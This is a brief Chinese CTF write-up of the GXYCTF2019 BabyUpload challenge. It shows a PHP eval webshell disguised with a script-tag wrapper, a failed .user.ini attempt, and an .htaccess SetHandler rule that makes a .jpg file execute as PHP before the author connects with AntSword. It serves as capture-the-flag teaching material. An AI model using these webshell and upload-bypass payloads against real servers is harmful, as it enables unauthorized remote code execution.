[GXYCTF2019]BabyUpload

Posted 墨子辰

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[GXYCTF2019]BabyUpload相关的知识,希望对你有一定的参考价值。

考点:.htaccess文件上传

<script language="php">@eval($_POST['a'])</script>

上传类型,先上传一个图片类型的马子

发现检测了上传内容,换个一句话(不带<?php的)

<script language="pHp">@eval($_POST['a'])</script>


发现可以成功上传,紧接着换成php 发现对文件名也有检测


试试不存在的文件名,以此来判断是否白名单限制

可以上传,以此推断是黑名单上传,这次我们使用.user.ini

auto_prepend_file=11.jpg

发现没有解析,为此我们继续换 .htaccess上传

<FilesMatch "11.jpg">
SetHandler application/x-httpd-php
</FilesMatch>


返回403说明解析成功。

再上传一个文件名为11.jpg的文件名

成功解析。上蚁剑

以上是关于[GXYCTF2019]BabyUpload的主要内容,如果未能解决你的问题,请参考以下文章

[GXYCTF2019]BabyUpload

BUU-WEB-[GXYCTF2019]BabyUpload

[GXYCTF2019]BabyUpload WP

BUUCTF [GXYCTF2019]BabyUpload

WEB漏洞攻防 - 文件上传漏洞 - CTF比赛类应用场景 - [GXYCTF2019]BabyUpload

BUUCTF | [GXYCTF2019]BabySQli